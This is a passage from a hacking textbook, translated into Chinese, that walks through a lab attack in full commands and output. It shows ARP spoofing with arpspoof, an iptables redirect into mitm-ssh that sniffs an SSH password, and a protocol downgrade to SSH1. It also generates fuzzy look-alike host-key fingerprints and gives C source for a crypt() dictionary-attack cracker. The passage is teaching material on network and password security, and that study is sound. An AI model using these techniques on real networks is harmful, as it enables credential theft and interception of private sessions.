所有这些都可以通过“Active Sniffing”中的 ARP 重定向技术以及一个名为 mitmssh 的修改过的 openssh 软件包来完成。还有其他一些工具也能做到这一点；然而，Claes Nyberg 的 mitm-ssh 是公开可用的，并且是最健壮的。源代码包位于 LiveCD 的/usr/src/mitm-ssh 目录中，它已经被构建并安装。运行时，它接受指定端口的连接，然后将这些连接代理到目标 SSH 服务器的真实目标 IP 地址。借助 arpspoof 毒化 ARP 缓存，可以将目标 SSH 服务器的流量重定向到运行 mitm-ssh 的攻击者机器。由于该程序监听 localhost，因此需要一些 IP 过滤规则来重定向流量。

在下面的例子中，目标 SSH 服务器位于 192.168.42.72。当运行 mitm-ssh 时，它将在端口 2222 上监听，因此不需要以 root 身份运行。iptables 命令告诉 Linux 将端口 22 上的所有传入 TCP 连接重定向到 localhost 2222，在那里 mitm-ssh 将监听。

reader@hacking:~ $ sudo iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT
 --to-ports 2222
reader@hacking:~ $ sudo iptables -t nat -L
Chain PREROUTING (policy ACCEPT)
target     prot opt source               destination         
REDIRECT   tcp  --  anywhere             anywhere            tcp dpt:ssh redir ports 2222

Chain POSTROUTING (policy ACCEPT)
target     prot opt source               destination         

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination         
reader@hacking:~ $ mitm-ssh

 ..  
/|\    SSH Man In The Middle [Based on OpenSSH_3.9p1]
_|_    By CMN <cmn@darklab.org>

Usage: mitm-ssh <non-nat-route> [option(s)]

Routes:

  <host>[:<port>]  - Static route to port on host
                    (for non NAT connections)
Options:
  -v             - Verbose output
  -n             - Do not attempt to resolve hostnames
  -d             - Debug, repeat to increase verbosity
  -p port        - Port to listen for connections on
  -f configfile  - Configuration file to read

Log Options:
  -c logdir      - Log data from client in directory
  -s logdir      - Log data from server in directory
  -o file        - Log passwords to file

reader@hacking:~ $ mitm-ssh 192.168.42.72 -v -n -p 2222
Using static route to 192.168.42.72:22
SSH MITM Server listening on 0.0.0.0 port 2222.
Generating 768 bit RSA key.
RSA key generation complete.

然后在同一台机器上的另一个终端窗口中，使用 Dug Song 的 arpspoof 工具来毒化 ARP 缓存，并将目标为 192.168.42.72 的流量重定向到我们的机器上，而不是直接到目标机器。

reader@hacking:~ $ arpspoof
Version: 2.3
Usage: arpspoof [-i interface] [-t target] host
reader@hacking:~ $ sudo arpspoof -i eth0 192.168.42.72
0:12:3f:7:39:9c ff:ff:ff:ff:ff:ff 0806 42: arp reply 192.168.42.72 is-at 0:12:3f:7:39:9c
0:12:3f:7:39:9c ff:ff:ff:ff:ff:ff 0806 42: arp reply 192.168.42.72 is-at 0:12:3f:7:39:9c 
0:12:3f:7:39:9c ff:ff:ff:ff:ff:ff 0806 42: arp reply 192.168.42.72 is-at 0:12:3f:7:39:9c

现在中间人攻击已经设置好，准备迎接下一个毫无防备的受害者。下面的输出来自网络上的另一台机器（192.168.42.250），该机器尝试连接到 192.168.42.72。

在机器 192.168.42.250 (tetsuo) 上，连接到 192.168.42.72 (loki)

iz@tetsuo:~ $ ssh jose@192.168.42.72
The authenticity of host '192.168.42.72 (192.168.42.72)' can't be established.
RSA key fingerprint is 84:7a:71:58:0f:b5:5e:1b:17:d7:b5:9c:81:5a:56:7c.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.42.72' (RSA) to the list of known hosts.
jose@192.168.42.72's password: 
Last login: Mon Oct  1 06:32:37 2007 from 192.168.42.72
Linux loki 2.6.20-16-generic #2 SMP Thu Jun 7 20:19:32 UTC 2007 i686

jose@loki:~ $ ls -a
.  ..  .bash_logout  .bash_profile  .bashrc  .bashrc.swp  .profile  Examples
jose@loki:~ $ id
uid=1001(jose) gid=1001(jose) groups=1001(jose)
jose@loki:~ $ exit
logout

Connection to 192.168.42.72 closed. 

iz@tetsuo:~ $

一切看起来都很正常，连接似乎很安全。然而，连接实际上是秘密地通过攻击者的机器路由的，该机器使用一个单独的加密连接返回目标服务器。在攻击者的机器上，关于连接的所有信息都已记录。

在攻击者的机器上

reader@hacking:~ $ sudo mitm-ssh 192.168.42.72 -v -n -p 2222
Using static route to 192.168.42.72:22
SSH MITM Server listening on 0.0.0.0 port 2222.
Generating 768 bit RSA key.
RSA key generation complete.
WARNING: /usr/local/etc/moduli does not exist, using fixed modulus
[MITM] Found real target 192.168.42.72:22 for NAT host 192.168.42.250:1929
[MITM] Routing SSH2 192.168.42.250:1929 -> 192.168.42.72:22

[2007-10-01 13:33:42] MITM (SSH2) 192.168.42.250:1929 -> 192.168.42.72:22
SSH2_MSG_USERAUTH_REQUEST: jose ssh-connection password 0 sP#byp%srt

[MITM] Connection from UNKNOWN:1929 closed
reader@hacking:~ $ ls /usr/local/var/log/mitm-ssh/
passwd.log
ssh2 192.168.42.250:1929 <- 192.168.42.72:22
ssh2 192.168.42.250:1929 -> 192.168.42.72:22
reader@hacking:~ $ cat /usr/local/var/log/mitm-ssh/passwd.log 
[2007-10-01 13:33:42] MITM (SSH2) 192.168.42.250:1929 -> 192.168.42.72:22
SSH2_MSG_USERAUTH_REQUEST: jose ssh-connection password 0 sP#byp%srt

reader@hacking:~ $ cat /usr/local/var/log/mitm-ssh/ssh2*
Last login: Mon Oct  1 06:32:37 2007 from 192.168.42.72
Linux loki 2.6.20-16-generic #2 SMP Thu Jun 7 20:19:32 UTC 2007 i686
jose@loki:~ $ ls -a
.  ..  .bash_logout  .bash_profile  .bashrc  .bashrc.swp  .profile  Examples
jose@loki:~ $ id
uid=1001(jose) gid=1001(jose) groups=1001(jose)
jose@loki:~ $ exit 
logout

由于认证实际上被重定向，攻击者的机器作为代理，密码 sP#byp%srt 可以被嗅探。此外，连接期间传输的数据被捕获，显示了攻击者看到了受害者在整个 SSH 会话期间所做的一切。

攻击者能够伪装成任一方的能力使得这种攻击成为可能。SSL 和 SSH 都是考虑到这一点而设计的，并且有防止身份欺骗的保护措施。SSL 使用证书来验证身份，而 SSH 使用宿主指纹。如果 A 尝试与攻击者打开加密通信通道时，攻击者没有 B 的正确证书或指纹，签名将不会匹配，A 将收到一个警告。

在前面的例子中，192.168.42.250 (tetsuo) 从未与 192.168.42.72 (loki) 通过 SSH 进行过通信，因此没有宿主指纹。它接受的宿主指纹实际上是 mitm-ssh 生成的指纹。但是，如果 192.168.42.250 (tetsuo) 为 192.168.42.72 (loki) 有一个宿主指纹，整个攻击就会被检测到，用户将看到一个非常明显的警告：

iz@tetsuo:~ $ ssh jose@192.168.42.72
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@    WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED!     @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!
Someone could be eavesdropping on you right now (man-in-the-middle attack)!
It is also possible that the RSA host key has just been changed.
The fingerprint for the RSA key sent by the remote host is
84:7a:71:58:0f:b5:5e:1b:17:d7:b5:9c:81:5a:56:7c.
Please contact your system administrator.
Add correct host key in /home/jon/.ssh/known_hosts to get rid of this message.
Offending key in /home/jon/.ssh/known_hosts:1
RSA host key for 192.168.42.72 has changed and you have requested strict checking.
Host key verification failed. 
iz@tetsuo:~ $

openssh 客户端实际上会阻止用户连接，直到旧的宿主指纹被移除。然而，许多 Windows SSH 客户端并没有对这些规则进行同样的严格执行，而是会向用户显示一个“你确定要继续吗？”的对话框。一个不知情的使用者可能会直接点击通过警告。

不同的 SSH 协议宿主指纹

SSH 宿主指纹确实存在一些漏洞。这些漏洞在最新的 openssh 版本中得到了补偿，但在旧的实施中仍然存在。

通常，第一次将 SSH 连接到新的主机时，该主机的指纹会被添加到 known_hosts 文件中，如下所示：

iz@tetsuo:~ $ ssh jose@192.168.42.72
The authenticity of host '192.168.42.72 (192.168.42.72)' can't be established.
RSA key fingerprint is ba:06:7f:d2:b9:74:a8:0a:13:cb:a2:f7:e0:10:59:a0.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.42.72' (RSA) to the list of known hosts.
jose@192.168.42.72's password: <ctrl-c>
iz@tetsuo:~ $ grep 192.168.42.72 ~/.ssh/known_hosts 
192.168.42.72 ssh-rsa 
AAAAB3NzaC1yc2EAAAABIwAAAIEA8Xq6H28EOiCbQaFbIzPtMJSc316SH4aOijgkf7nZnH4LirNziH5upZmk4/
JSdBXcQohiskFFeHadFViuB4xIURZeF3Z7OJtEi8aupf2pAnhSHF4rmMV1pwaSuNTahsBoKOKSaTUOW0RN/1t3G/
52KTzjtKGacX4gTLNSc8fzfZU= 
iz@tetsuo:~ $

然而，SSH 有两种不同的协议——SSH1 和 SSH2——每种协议都有自己的宿主指纹。

iz@tetsuo:~ $ rm ~/.ssh/known_hosts 
iz@tetsuo:~ $ ssh -1 jose@192.168.42.72
The authenticity of host '192.168.42.72 (192.168.42.72)' can't be established.
RSA1 key fingerprint is e7:c4:81:fe:38:bc:a8:03:f9:79:cd:16:e9:8f:43:55.
Are you sure you want to continue connecting (yes/no)? no
Host key verification failed.
iz@tetsuo:~ $ ssh -2 jose@192.168.42.72
The authenticity of host '192.168.42.72 (192.168.42.72)' can't be established.
RSA key fingerprint is ba:06:7f:d2:b9:74:a8:0a:13:cb:a2:f7:e0:10:59:a0.
Are you sure you want to continue connecting (yes/no)? no
Host key verification failed. 
iz@tetsuo:~ $

SSH 服务器提供的标语描述了它理解哪些 SSH 协议（以下内容加粗显示）：

iz@tetsuo:~ $ telnet 192.168.42.72 22
Trying 192.168.42.72...
Connected to 192.168.42.72.
Escape character is '^]'.
`SSH-1.99-OpenSSH_3.9p1`

Connection closed by foreign host.
iz@tetsuo:~ $ telnet 192.168.42.1 22
Trying 192.168.42.1...
Connected to 192.168.42.1.
Escape character is '^]'.
`SSH-2.0-OpenSSH_4.3p2 Debian-8ubuntu1`

Connection closed by foreign host.
iz@tetsuo:~ $

来自 192.168.42.72（loki）的 banner 包含字符串 SSH-1.99，按照惯例，这意味着服务器支持协议 1 和 2。通常，SSH 服务器会被配置为包含一行如 Protocol 2,1，这也意味着服务器支持这两种协议，并尽可能使用 SSH2。这是为了保持向后兼容性，以便仅支持 SSH1 的客户端仍然可以连接。

相比之下，来自 192.168.42.1 的 banner 包含字符串 SSH-2.0，这表明服务器只支持协议 2。在这种情况下，很明显，连接到它的任何客户端都只与 SSH2 通信，因此只有协议 2 的主机指纹。

对于 loki（192.168.42.72）来说，情况也是如此；然而，loki 还接受 SSH1，它有一组不同的主机指纹。不太可能客户端会使用 SSH1，因此还没有为该协议存储主机指纹。

如果用于 MitM 攻击的修改后的 SSH 守护进程强制客户端使用其他协议进行通信，则不会找到任何主机指纹。用户不会看到冗长的警告，而是简单地被要求添加新的指纹。mitm-sshtool 使用与 openssh 相似的配置文件，因为它是由该代码构建的。通过在 /usr/local/etc/mitm-ssh_config 中添加 Protocol 1 行，mitm-ssh 守护进程将声称它只支持 SSH1 协议。

下面的输出显示，loki 的 SSH 服务器通常使用 SSH1 和 SSH2 协议进行通信，但当使用新的配置文件将 mitm-ssh 放在中间时，伪造的服务器声称它只支持 SSH1 协议。

来自 192.168.42.250（tetsuo），网络上的一个无辜的机器

iz@tetsuo:~ $ telnet 192.168.42.72 22
Trying 192.168.42.72...
Connected to 192.168.42.72.
Escape character is '^]'.
`SSH-1.99-OpenSSH_3.9p1`

Connection closed by foreign host.
iz@tetsuo:~ $ rm ~/.ssh/known_hosts 
iz@tetsuo:~ $ ssh jose@192.168.42.72
The authenticity of host '192.168.42.72 (192.168.42.72)' can't be established.
RSA key fingerprint is ba:06:7f:d2:b9:74:a8:0a:13:cb:a2:f7:e0:10:59:a0.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.42.72' (RSA) to the list of known hosts.
jose@192.168.42.72's password:  

iz@tetsuo:~ $

在攻击者的机器上，设置 mitm-ssh 以仅使用 SSH1 协议

reader@hacking:~ $ echo "Protocol 1" >> /usr/local/etc/mitm-ssh_config 
reader@hacking:~ $ tail /usr/local/etc/mitm-ssh_config 
# Where to store passwords
#PasswdLogFile /var/log/mitm-ssh/passwd.log

# Where to store data sent from client to server
#ClientToServerLogDir /var/log/mitm-ssh

# Where to store data sent from server to client
#ServerToClientLogDir /var/log/mitm-ssh

`Protocol 1`
reader@hacking:~ $ mitm-ssh 192.168.42.72 -v -n -p 2222
Using static route to 192.168.42.72:22
SSH MITM Server listening on 0.0.0.0 port 2222.
Generating 768 bit RSA key. 
RSA key generation complete.

现在回到 192.168.42.250（tetsuo）

iz@tetsuo:~ $ telnet 192.168.42.72 22
Trying 192.168.42.72...
Connected to 192.168.42.72.
Escape character is '^]'.
`SSH-1.5-OpenSSH_3.9p1`

Connection closed by foreign host.

通常，像 tetsuo 这样的客户端连接到 192.168.42.72 的 loki 时，只会使用 SSH2 进行通信。因此，客户端上只会存储 SSH 协议 2 的主机指纹。当 MitM 攻击强制使用协议 1 时，由于协议不同，攻击者的指纹将不会与存储的指纹进行比较。较旧的实现将简单地要求添加此指纹，因为技术上不存在此协议的主机指纹。这在下面的输出中显示。

iz@tetsuo:~ $ ssh jose@192.168.42.72
The authenticity of host '192.168.42.72 (192.168.42.72)' can't be established.
RSA1 key fingerprint is 45:f7:8d:ea:51:0f:25:db:5a:4b:9e:6a:d6:3c:d0:a6\. 
Are you sure you want to continue connecting (yes/no)?

由于这个漏洞已被公开，OpenSSH 的新版本实现有一个稍微更详细的警告：

iz@tetsuo:~ $ ssh jose@192.168.42.72
WARNING: RSA key found for host 192.168.42.72
in /home/iz/.ssh/known_hosts:1
RSA key fingerprint ba:06:7f:d2:b9:74:a8:0a:13:cb:a2:f7:e0:10:59:a0.
The authenticity of host '192.168.42.72 (192.168.42.72)' can't be established
but keys of different type are already known for this host.
RSA1 key fingerprint is 45:f7:8d:ea:51:0f:25:db:5a:4b:9e:6a:d6:3c:d0:a6\. 
Are you sure you want to continue connecting (yes/no)?

这种修改后的警告不如在相同协议的主机指纹不匹配时给出的警告强烈。此外，由于并非所有客户端都会更新，这种技术仍然可以证明对中间人攻击（MitM）是有用的。

模糊指纹

Konrad Rieck 关于 SSH 主机指纹有一个有趣的想法。通常，用户会从几个不同的客户端连接到服务器。每次使用新的客户端时，都会显示并添加主机指纹，一个有安全意识的用户往往会记住主机指纹的一般结构。虽然没有人真正记住整个指纹，但通过一点努力就可以检测到主要的变化。当从新的客户端连接时，对主机指纹的一般了解大大增加了连接的安全性。如果尝试中间人攻击，主机指纹的明显差异通常可以通过肉眼检测到。

然而，眼睛和大脑可能会被骗。某些指纹看起来与其他指纹非常相似。数字 1 和 7 在显示字体不同的情况下看起来非常相似。通常，指纹开头和结尾找到的十六进制数字记得最清楚，而中间部分往往有点模糊。模糊指纹技术的目标是通过生成一个指纹看起来足够接近原始指纹，以至于可以欺骗人眼的主机密钥。

openssh 软件包提供了从服务器检索主机密钥的工具。

reader@hacking:~ $ ssh-keyscan -t rsa 192.168.42.72 > loki.hostkey
# 192.168.42.72 SSH-1.99-OpenSSH_3.9p1
reader@hacking:~ $ cat loki.hostkey 
192.168.42.72 ssh-rsa 
AAAAB3NzaC1yc2EAAAABIwAAAIEA8Xq6H28EOiCbQaFbIzPtMJSc316SH4aOijgkf7nZnH4LirNziH5upZmk4/
JSdBXcQohiskFFeHadFViuB4xIURZeF3Z7OJtEi8aupf2pAnhSHF4rmMV1pwaSuNTahsBoKOKSaTUOW0RN/1t3G/
52KTzjtKGacX4gTLNSc8fzfZU=
reader@hacking:~ $ ssh-keygen -l -f loki.hostkey 
1024 ba:06:7f:d2:b9:74:a8:0a:13:cb:a2:f7:e0:10:59:a0 192.168.42.72 
reader@hacking:~ $

现在，已知 192.168.42.72（loki）的主机密钥指纹格式，可以生成看起来相似的模糊指纹。Rieck 开发了一个执行此操作的程序，可在www.thc.org/thc-ffp/找到。以下输出显示了为 192.168.42.72（loki）创建的一些模糊指纹。

reader@hacking:~ $ ffp
Usage: ffp [Options]
Options:
  -f type       Specify type of fingerprint to use [Default: md5]
                Available: md5, sha1, ripemd
  -t hash       Target fingerprint in byte blocks. 
                Colon-separated: 01:23:45:67... or as string 01234567...
  -k type       Specify type of key to calculate [Default: rsa]
                Available: rsa, dsa
  -b bits       Number of bits in the keys to calculate [Default: 1024]
  -K mode       Specify key calulation mode [Default: sloppy]
                Available: sloppy, accurate
  -m type       Specify type of fuzzy map to use [Default: gauss]
                Available: gauss, cosine
  -v variation  Variation to use for fuzzy map generation [Default: 7.3]
  -y mean       Mean value to use for fuzzy map generation [Default: 0.14]
  -l size       Size of list that contains best fingerprints [Default: 10]
  -s filename   Filename of the state file [Default: /var/tmp/ffp.state]
  -e            Extract SSH host key pairs from state file
  -d directory  Directory to store generated ssh keys to [Default: /tmp]
  -p period     Period to save state file and display state [Default: 60]
  -V            Display version information
No state file /var/tmp/ffp.state present, specify a target hash.
reader@hacking:~ $ ffp -f md5 -k rsa -b 1024 -t ba:06:7f:d2:b9:74:a8:0a:13:cb:a2:f7:e0:
10:59:a0
---[Initializing]---------------------------------------------------------------
 Initializing Crunch Hash: Done
   Initializing Fuzzy Map: Done
 Initializing Private Key: Done
   Initializing Hash List: Done
   Initializing FFP State: Done
---[Fuzzy Map]------------------------------------------------------------------
    Length: 32
      Type: Inverse Gaussian Distribution
       Sum: 15020328
 Fuzzy Map:  10.83% | 9.64% : 8.52% | 7.47% : 6.49% | 5.58% : 4.74% | 3.96% :
             3.25% | 2.62% : 2.05% | 1.55% : 1.12% | 0.76% : 0.47% | 0.24% :
             0.09% | 0.01% : 0.00% | 0.06% : 0.19% | 0.38% : 0.65% | 0.99% :
             1.39% | 1.87% : 2.41% | 3.03% : 3.71% | 4.46% : 5.29% | 6.18% :

---[Current Key]----------------------------------------------------------------
               Key Algorithm: RSA (Rivest Shamir Adleman)
        Key Bits / Size of n: 1024 Bits
                Public key e: 0x10001
 Public Key Bits / Size of e: 17 Bits
        Phi(n) and e r.prime: Yes
             Generation Mode: Sloppy

 State File: /var/tmp/ffp.state
 Running...

---[Current State]--------------------------------------------------------------
 Running:   0d 00h 00m 00s | Total:          0k hashs | Speed:      nan hashs/s 
--------------------------------------------------------------------------------
 Best Fuzzy Fingerprint from State File /var/tmp/ffp.state
   Hash Algorithm: Message Digest 5 (MD5)
      Digest Size: 16 Bytes / 128 Bits
   Message Digest: 6a:06:f9:a6:cf:09:19:af:c3:9d:c5:b9:91:a4:8d:81
    Target Digest: ba:06:7f:d2:b9:74:a8:0a:13:cb:a2:f7:e0:10:59:a0
    Fuzzy Quality: 25.652482%

---[Current State]--------------------------------------------------------------
 Running:   0d 00h 01m 00s | Total:       7635k hashs | Speed:   127242 hashs/s 
--------------------------------------------------------------------------------
 Best Fuzzy Fingerprint from State File /var/tmp/ffp.state
   Hash Algorithm: Message Digest 5 (MD5)
      Digest Size: 16 Bytes / 128 Bits
   Message Digest: ba:06:3a:8c:bc:73:24:64:5b:8a:6d:fa:a6:1c:09:80
    Target Digest: ba:06:7f:d2:b9:74:a8:0a:13:cb:a2:f7:e0:10:59:a0
    Fuzzy Quality: 55.471931%

---[Current State]--------------------------------------------------------------
 Running:   0d 00h 02m 00s | Total:      15370k hashs | Speed:   128082 hashs/s 
--------------------------------------------------------------------------------
 Best Fuzzy Fingerprint from State File /var/tmp/ffp.state
   Hash Algorithm: Message Digest 5 (MD5)
      Digest Size: 16 Bytes / 128 Bits
   Message Digest: ba:06:3a:8c:bc:73:24:64:5b:8a:6d:fa:a6:1c:09:80
    Target Digest: ba:06:7f:d2:b9:74:a8:0a:13:cb:a2:f7:e0:10:59:a0
    Fuzzy Quality: 55.471931%

.:[ output trimmed ]:.
---[Current State]--------------------------------------------------------------
Running: 1d 05h 06m 00s | Total: 13266446k hashs | Speed: 126637 hashs/s 
--------------------------------------------------------------------------------
Best Fuzzy Fingerprint from State File /var/tmp/ffp.state
Hash Algorithm: Message Digest 5 (MD5)
Digest Size: 16 Bytes / 128 Bits
Message Digest: ba:0d:7f:d2:64:76:b8:9c:f1:22:22:87:b0:26:59:50
Target Digest: ba:06:7f:d2:b9:74:a8:0a:13:cb:a2:f7:e0:10:59:a0
Fuzzy Quality: 70.158321%

--------------------------------------------------------------------------------
Exiting and saving state file /var/tmp/ffp.state 
reader@hacking:~ $

这种模糊指纹生成过程可以持续进行，直到所需的时间。程序会跟踪一些最好的指纹，并会定期显示它们。所有状态信息都存储在/var/tmp/ffp.state 中，因此程序可以通过按 CTRL-C 退出，然后通过简单地运行ffp而不带任何参数来稍后再次继续。

运行一段时间后，可以使用-e开关从状态文件中提取 SSH 主机密钥对。

reader@hacking:~ $ ffp -e -d /tmp
---[Restoring]------------------------------------------------------------------
   Reading FFP State File: Done
    Restoring environment: Done
 Initializing Crunch Hash: Done
--------------------------------------------------------------------------------
 Saving SSH host key pairs: [00] [01] [02] [03] [04] [05] [06] [07] [08] [09] 
reader@hacking:~ $ ls /tmp/ssh-rsa*
/tmp/ssh-rsa00      /tmp/ssh-rsa02.pub  /tmp/ssh-rsa05      /tmp/ssh-rsa07.pub
/tmp/ssh-rsa00.pub  /tmp/ssh-rsa03      /tmp/ssh-rsa05.pub  /tmp/ssh-rsa08
/tmp/ssh-rsa01      /tmp/ssh-rsa03.pub  /tmp/ssh-rsa06      /tmp/ssh-rsa08.pub
/tmp/ssh-rsa01.pub  /tmp/ssh-rsa04      /tmp/ssh-rsa06.pub  /tmp/ssh-rsa09
/tmp/ssh-rsa02      /tmp/ssh-rsa04.pub  /tmp/ssh-rsa07      /tmp/ssh-rsa09.pub 
reader@hacking:~ $

在前面的例子中，生成了 10 个公钥和私钥的主机密钥对。然后可以生成这些密钥对的指纹，并与原始指纹进行比较，如下面的输出所示。

reader@hacking:~ $ for i in $(ls -1 /tmp/ssh-rsa*.pub)
> do
> ssh-keygen -l -f $i
> done
1024 ba:0d:7f:d2:64:76:b8:9c:f1:22:22:87:b0:26:59:50 /tmp/ssh-rsa00.pub
1024 ba:06:7f:12:bd:8a:5b:5c:eb:dd:93:ec:ec:d3:89:a9 /tmp/ssh-rsa01.pub
`1024 ba:06:7e:b2:64:13:cf:0f:a4:69:17:d0:60:62:69:a0 /tmp/ssh-rsa02.pub`
1024 ba:06:49:d4:b9:d4:96:4b:93:e8:5d:00:bd:99:53:a0 /tmp/ssh-rsa03.pub
1024 ba:06:7c:d2:15:a2:d3:0d:bf:f0:d4:5d:c6:10:22:90 /tmp/ssh-rsa04.pub
1024 ba:06:3f:22:1b:44:7b:db:41:27:54:ac:4a:10:29:e0 /tmp/ssh-rsa05.pub
1024 ba:06:78:dc:be:a6:43:15:eb:3f:ac:92:e5:8e:c9:50 /tmp/ssh-rsa06.pub
1024 ba:06:7f:da:ae:61:58:aa:eb:55:d0:0c:f6:13:61:30 /tmp/ssh-rsa07.pub
1024 ba:06:7d:e8:94:ad:eb:95:d2:c5:1e:6d:19:53:59:a0 /tmp/ssh-rsa08.pub
1024 ba:06:74:a2:c2:8b:a4:92:e1:e1:75:f5:19:15:60:a0 /tmp/ssh-rsa09.pub
reader@hacking:~ $ ssh-keygen -l -f ./loki.hostkey 
1024 ba:06:7f:d2:b9:74:a8:0a:13:cb:a2:f7:e0:10:59:a0 192.168.42.72 
reader@hacking:~ $

从生成的 10 个密钥对中，可以通过肉眼判断出看起来最相似的一个。在这种情况下，被加粗显示的 ssh-rsa02.pub 被选中。然而，无论选择哪个密钥对，它看起来肯定比任何随机生成的密钥更像原始指纹。

这个新的密钥可以与 mitm-ssh 一起使用，以进行更有效的攻击。主机密钥的位置在配置文件中指定，因此使用新密钥只需在/usr/local/etc/mitm-ssh_config 中添加一个HostKey行，如下所示。由于我们需要删除之前添加的Protocol 1行，下面的输出只是简单地覆盖了配置文件。

reader@hacking:~ $ echo "HostKey /tmp/ssh-rsa02" > /usr/local/etc/mitm-ssh_config 
reader@hacking:~ $ mitm-ssh 192.168.42.72 -v -n -p 2222Using static route to 192.168.
42.72:22
Disabling protocol version 1\. Could not load host key 
SSH MITM Server listening on 0.0.0.0 port 2222.

在另一个终端窗口中，arpspoof 正在运行，以将流量重定向到使用模糊指纹的新主机密钥的 mitm-ssh。下面的输出比较了客户端在连接时看到的输出。

正常连接

iz@tetsuo:~ $ ssh jose@192.168.42.72
The authenticity of host '192.168.42.72 (192.168.42.72)' can't be established.
RSA key fingerprint is ba:06:7f:d2:b9:74:a8:0a:13:cb:a2:f7:e0:10:59:a0\. 
Are you sure you want to continue connecting (yes/no)?

中间人攻击连接

iz@tetsuo:~ $ ssh jose@192.168.42.72
The authenticity of host '192.168.42.72 (192.168.42.72)' can't be established.
RSA key fingerprint is ba:06:7e:b2:64:13:cf:0f:a4:69:17:d0:60:62:69:a0\. 
Are you sure you want to continue connecting (yes/no)?

你能立即分辨出差异吗？这些指纹看起来足够相似，足以欺骗大多数人简单地接受连接。

密码破解

密码通常不会以明文形式存储。包含所有密码的明文文件会是一个极具吸引力的目标，因此，相反地，使用单向散列函数。这些函数中最著名的是基于 DES 的，称为crypt()，这在下面的手册页中有描述。

NAME
       crypt - password and data encryption

SYNOPSIS
       #define _XOPEN_SOURCE
       #include <unistd.h>

       char *crypt(const char *key, const char *salt);

DESCRIPTION
       crypt()  is  the  password  encryption  function.  It is based on the Data
       Encryption  Standard  algorithm  with  variations  intended  (among  other
       things) to discourage use of hardware implementations of a key search.

       key is a user's typed password.

       salt  is  a  two-character string chosen from the set [a-zA-Z0-9./].  This 
       string is used to perturb the algorithm in one of 4096 different ways.

这是一个单向散列函数，它期望输入明文密码和盐值，然后输出一个带有盐值前缀的散列。这个散列在数学上是不可逆的，这意味着仅使用散列无法确定原始密码。编写一个快速程序来实验这个函数将有助于澄清任何混淆。

密码破解

`crypt_test.c`

#define _XOPEN_SOURCE
#include <unistd.h>
#include <stdio.h>

int main(int argc, char *argv[]) {
   if(argc < 2) { 
      printf("Usage: %s <plaintext password> <salt value>\n", argv[0]);
      exit(1); 
   }
   printf("password \"%s\" with salt \"%s\" ", argv[1], argv[2]);
   printf("hashes to ==> %s\n", crypt(argv[1], argv[2])); 
}

当这个程序编译时，需要链接 crypt 库。这在上面的输出中显示，以及一些测试运行。

reader@hacking:~/booksrc $ gcc -o crypt_test crypt_test.c 
/tmp/cccrSvYU.o: In function `main':
crypt_test.c:(.text+0x73): undefined reference to `crypt'
collect2: ld returned 1 exit status
reader@hacking:~/booksrc $ gcc -o crypt_test crypt_test.c -l crypt
reader@hacking:~/booksrc $ ./crypt_test testing je
password "testing" with salt "je" hashes to ==> jeLu9ckBgvgX.
reader@hacking:~/booksrc $ ./crypt_test test je
password "test" with salt "je" hashes to ==> jeHEAX1m66RV.
reader@hacking:~/booksrc $ ./crypt_test test xy
password "test" with salt "xy" hashes to ==> xyVSuHLjceD92 
reader@hacking:~/booksrc $

注意，在最后两次运行中，使用了相同的密码进行加密，但使用了不同的盐值。盐值被用来进一步扰动算法，因此如果使用不同的盐值，相同的明文值可以有多个散列值。散列值（包括前缀的盐值）在密码文件中存储，前提是如果攻击者窃取了密码文件，散列值将毫无用处。

当一个合法用户需要使用密码散列进行身份验证时，该用户的散列值会在密码文件中进行查找。系统会提示用户输入她的密码，从密码文件中提取原始的盐值，然后将用户输入的内容通过相同的单向散列函数与盐值一起处理。如果输入了正确的密码，单向散列函数将产生与密码文件中存储的散列值相同的输出。这允许身份验证按预期工作，而无需存储明文密码。

字典攻击

然而，事实表明，密码文件中的加密密码并非毫无用处。当然，从数学上讲，无法逆向散列，但可以使用特定的盐值快速散列字典中的每个单词，并将结果与该散列值进行比较。如果散列值匹配，那么字典中的那个单词必须是明文密码。

一个简单的字典攻击程序可以很容易地制作出来。它只需要从文件中读取单词，使用适当的盐值对每个单词进行散列，并在找到匹配项时显示该单词。以下源代码使用文件流函数实现，这些函数包含在 stdio.h 中。这些函数更容易处理，因为它们使用 FILE 结构指针封装了 open() 调用和文件描述符的混乱，而不是直接使用。在下面的源代码中，fopen() 调用的 r 参数告诉它以读取模式打开文件。如果失败，它返回 NULL，或者指向打开的文件流。fgets() 调用从文件流中获取一个字符串，直到达到最大长度或遇到行尾。在这种情况下，它用于从单词列表文件中读取每一行。此函数在失败时也返回 NULL，这被用来检测文件末尾。

crypt_crack.c

#define _XOPEN_SOURCE
#include <unistd.h>
#include <stdio.h>

/* Barf a message and exit. */
void barf(char *message, char *extra) {
   printf(message, extra);
   exit(1);
}

/* A dictionary attack example program */
int main(int argc, char *argv[]) {
   FILE *wordlist;
   char *hash, word[30], salt[3];
   if(argc < 2)
      barf("Usage: %s <wordlist file> <password hash>\n", argv[0]);

   strncpy(salt, argv[2], 2); // First 2 bytes of hash are the salt.
   salt[2] = '\0';  // terminate string

   printf("Salt value is \'%s\'\n", salt);

   if( (wordlist = fopen(argv[1], "r")) == NULL) // Open the wordlist.
      barf("Fatal: couldn't open the file \'%s\'.\n", argv[1]);

   while(fgets(word, 30, wordlist) != NULL) { // Read each word
      word[strlen(word)-1] = '\0'; // Remove the '\n' byte at the end.
      hash = crypt(word, salt); // Hash the word using the salt.
      printf("trying word:   %-30s ==> %15s\n", word, hash);
      if(strcmp(hash, argv[2]) == 0) { // If the hash matches
         printf("The hash \"%s\" is from the ", argv[2]);
         printf("plaintext password \"%s\".\n", word);
         fclose(wordlist);
         exit(0);
      }
   }
   printf("Couldn't find the plaintext password in the supplied wordlist.\n");
   fclose(wordlist); 
}

以下输出显示了该程序被用来破解密码散列 jeHEAX1m66RV.，使用了位于 /usr/share/dict/words 中的单词。

reader@hacking:~/booksrc $ gcc -o crypt_crack crypt_crack.c -lcrypt
reader@hacking:~/booksrc $ ./crypt_crack /usr/share/dict/words jeHEAX1m66RV.
